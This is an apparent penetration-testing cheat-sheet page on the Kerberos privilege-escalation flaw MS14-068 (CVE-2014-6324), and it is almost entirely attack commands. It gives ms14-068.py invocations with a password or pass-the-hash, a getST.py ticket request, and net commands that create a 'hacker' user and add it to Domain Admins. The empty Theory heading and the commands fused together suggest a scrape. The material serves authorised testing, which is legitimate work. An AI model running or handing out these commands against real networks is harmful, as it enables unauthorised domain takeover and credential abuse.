MS14-068
CVE-2014-6324
Theory
Practice
# with a plaintext password
ms14-068.py -u 'BASICUSER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'BASICUSER_SID' -d 'DOMAIN_CONTROLLER'
# with pass-the-hash
ms14-068.py -u 'BASICUSER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'BASICUSER_SID' -d 'DOMAIN_CONTROLLER'getST.py -k -no-pass -spn 'any_valid_spn' $DOMAIN_FQDN/$USERnet user "hacker" "132Pentest!!!" /domain /add
net group "Domain Admins" /domain /addResources
Last updated
Was this helpful?